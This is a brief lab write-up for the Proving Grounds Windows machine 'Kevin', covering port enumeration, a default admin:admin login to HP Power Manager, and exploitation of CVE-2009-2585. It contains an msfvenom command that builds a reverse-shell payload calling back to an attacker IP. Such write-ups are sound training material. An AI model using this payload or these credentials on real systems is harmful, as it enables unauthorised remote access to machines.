Kevin

Source: Proving Grounds OS: Windows Community Rating: Easy

Enumeration & Reconnaissance

Started autorecon and got flooded with open ports: 80, 135, 139, 445, 3389, 49152 -> 49159
Naturally, I started with my favorite, HTTP (80).

Gaining Initial Access

I was greeted by an HP Power Manager login page.

Out of pure muscle memory, I typed admin:admin, and boom, it worked. After a quick poke around that ended with nothing, I searched for exploits and found CVE-2009-2585.

Exploitation

To use this CVE, I needed a payload. So, I generated one with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.240 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python

Replaced the payload in the PoC and ran it, instant shell! And the best part? No privilege escalation needed. The exploit gave me SYSTEM straight away. Easiest win ever.

Privilege Escalation

None required; I was already SYSTEM upon initial access.

Lessons Learned

Check for CVEs

PreviousCraft NextSquid

Last updated 11 months ago

hashtagEnumeration & Reconnaissance

hashtagGaining Initial Access

hashtagExploitation

hashtagPrivilege Escalation

hashtagLessons Learned

Enumeration & Reconnaissance

Gaining Initial Access

Exploitation

Privilege Escalation

Lessons Learned